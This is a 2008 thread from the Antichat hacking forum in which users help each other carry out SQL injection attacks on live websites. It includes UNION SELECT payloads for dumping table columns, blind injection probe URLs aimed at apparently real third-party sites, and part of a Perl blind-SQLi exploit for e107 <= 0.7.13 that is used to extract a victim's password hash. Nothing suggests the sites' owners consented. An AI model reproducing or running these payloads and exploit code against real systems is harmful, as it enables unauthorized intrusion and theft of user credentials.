Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

10.11.2008, 19:50
|
|
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме: 1266776
Репутация:
93
|
|
where not summ10 = ""
|
|
|

10.11.2008, 20:01
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме: 192463
Репутация:
97
|
|
Сообщение от .acme
where not summ10 = ""
Делаю +from+table_name+where+not+summ10=""/*
Ошибка. Не получается.
Если делать так
+from+customers+where+summ10=271/* (значение 271 присутсвует в summ10) то выводит поле со всеми данными этой таблицы. Но мне надо всех, где значение summ10 не пустое..
Последний раз редактировалось Imperou$; 10.11.2008 в 20:03..
|
|
|

10.11.2008, 20:01
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме: 3244717
Репутация:
1980
|
|
+union+select+1,2,concat(summ1,0x3a3a,summ2,0x3 a 3a,summ3,0x3a3a,summ4,0x3a3a,summ5,0x3a3a,summ6,0x 3a3a,summ7,0x3a3a,summ8,0x3a3a,summ9,0x3a3a,summ10 ),4,5,6,7,8,9,10+from+table_name+where+summ10+<>+0/*
|
|
|

10.11.2008, 20:09
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме: 192463
Репутация:
97
|
|
[Raz0r]
Огромное спасибо! Вышло! =)
Очень признателен.
|
|
|

10.11.2008, 20:19
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
***.com/index.php?pid=-1'+union+select+1,2,3,4,5,6,7--
Ошибку выводит
You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7--'' at line 1
Число столбцов определил "order by"
Что делать не представляю
|
|
|

10.11.2008, 20:24
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме: 4075418
Репутация:
386
|
|
diznt попробуй вместо -- подставить /* или вообше там ниче неставь.А вообше кидай сюда линк на сайт если ниче страшного там нет , а люди посотрят что можно сделать 
|
|
|

10.11.2008, 20:25
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
Вот линк собственно
http://hipergroup.com/products.php?lv=3&cate=1&type=25&pid='&language=ru
|
|
|

10.11.2008, 21:04
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от diznt
Вот линк собственно
http://hipergroup.com/products.php?lv=3&cate=1&type=25&pid='&language=ru
Третья ветка
http://hipergroup.com/products.php?lv=3&cate=1&type=25&pid=1'+and+substr ing(version(),1,1)=3/*&language=1
|
|
|

10.11.2008, 21:31
|
|
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
Провел на форуме: 461696
Репутация:
40
|
|
сорри. продублирую
есть уязвимость "e107 <= 0.7.13 (usersettings.php) Blind SQL Injection Exploit"
вот эксплоит: http://www.securitylab.ru/poc/extra/361578.php
После того, как изменил $benchmark, вроде заработало, но теперь выдаёт такое:
Код:
[+] e107 <= 0.7.13 Blind SQL Injection
[+] Admin/User's Password Retrieve Exploit
[+] Coded by __GiReX__
[+] Logged in with your account..
[+] Checking database delay, please wait..
[+] Normal delay: 1
[+] Benchmark delay: 13
[+] Victim password: f
[-] Exploit mistake: please re-check benchmark
Я так понимаю, загвоздка где-то здесь:
Код:
for(my $j = 1; $j <= 32; $j++)
{
foreach $char(@cset)
{
info(chr($char), $hash, "password");
my ($pre_time, $post_time) = time();
$rv = check_char($char, $j, "user_password");
$post_time = time();
if($rv and ($post_time - $pre_time) > ($ndelay + 3))
{
$hash .= chr($char);
last;
}
}
last if $j != length($hash);
}
if(not defined $hash or length($hash) != 32)
{
print STDOUT "\n\n[-] Exploit mistake: please re-check benchmark\n";
exit;
}
Изменил строку "if(not defined $hash or length($hash) != 32)" на "if(not defined $hash)" и скрипт мне выдал:
Код:
...
[+] Logged in with your account..
[+] Checking database delay, please wait..
[+] Normal delay: 1
[+] Benchmark delay: 13
[+] Victim password: f
[+] You can try to login with this cookie:
[+] Cookie: e107cookie=1.d41d8cd98f00b204e9800998ecf8427e
Я подставил эти куки, но они не подходят. потом попробовал эксплоит на localhoste и до меня дошло, что он всегда выдаёт один и тот же хэш. В нём зашифрован пароль "".
Так что же делать? как заставить скрипт работать? подскажите плиз, я не бум-бум.
|
|
|

10.11.2008, 22:11
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме: 350782
Репутация:
81
|
|
почему не катит?:
http://www.ascon.kz/index.php?news=144+and+lower(substr((SELECT+TABLE_ NAME+FROM+INFORMATION_SCHEMA.TABLES+limit+1,1),1,1 ))='c'
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|